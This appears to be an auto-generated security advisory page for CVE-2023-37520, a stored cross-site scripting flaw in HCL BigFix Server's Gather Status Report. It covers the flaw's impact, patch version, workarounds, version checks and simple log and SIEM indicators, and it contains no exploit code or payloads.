CVE-2023-37520
📋 TL;DR
An unauthenticated stored cross-site scripting (XSS) vulnerability in BigFix Server version 9.5.12.68 allows attackers to inject malicious scripts into the Gather Status Report, which is served by BigFix Relay. This could enable data exfiltration, session hijacking, or other malicious actions when users view the compromised report. Organizations running the affected BigFix Server version are vulnerable.
💻 Affected Systems
- HCL BigFix Server
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal sensitive data (credentials, system information), hijack user sessions, redirect users to malicious sites, or perform actions on behalf of authenticated users.
Likely Case
Attackers would inject malicious scripts to steal session cookies or credentials from users who view the compromised Gather Status Report, potentially gaining unauthorized access to the BigFix console.
If Mitigated
With proper web application firewalls (WAFs), content security policies (CSP), and input validation, the impact would be limited to potential script execution being blocked or contained.
🎯 Exploit Status
As an unauthenticated stored XSS, exploitation requires injecting malicious scripts into the Gather Status Report, which then executes when users view it. No authentication is needed to trigger the vulnerability.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 9.5.12.69 or later
Vendor Advisory: https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0109376
Restart Required: Yes
Instructions:
1. Download the latest patch from HCL BigFix support portal. 2. Apply the patch to the BigFix Server. 3. Restart the BigFix Server services. 4. Verify the patch is applied by checking the version.
🔧 Temporary Workarounds
Disable Gather Status Report
allTemporarily disable the vulnerable Gather Status Report feature to prevent exploitation.
Consult BigFix documentation for disabling specific report features
Implement Content Security Policy (CSP)
allAdd CSP headers to restrict script execution from untrusted sources.
Add 'Content-Security-Policy' header with appropriate directives in web server configuration
🧯 If You Can't Patch
- Implement a web application firewall (WAF) with XSS protection rules to block malicious payloads.
- Restrict access to the BigFix Server console to trusted networks only and monitor for unusual activity.
🔍 How to Verify
Check if Vulnerable:
Check the BigFix Server version. If it is 9.5.12.68, it is vulnerable. Review system logs for any suspicious script injections in Gather Status Reports.Check Version:
On BigFix Server, run: 'besadmin -version' or check the console version in the BigFix UI.Verify Fix Applied:
After patching, verify the BigFix Server version is 9.5.12.69 or later. Test the Gather Status Report feature to ensure no XSS payloads execute.📡 Detection & Monitoring
Log Indicators:
- Unusual script tags or JavaScript code in Gather Status Report logs
- Multiple failed attempts to access or modify report data
Network Indicators:
- HTTP requests containing suspicious script payloads to BigFix Relay endpoints
- Unexpected data exfiltration from the BigFix Server
SIEM Query:
source="bigfix_logs" AND ("Gather Status Report" OR "XSS" OR "script")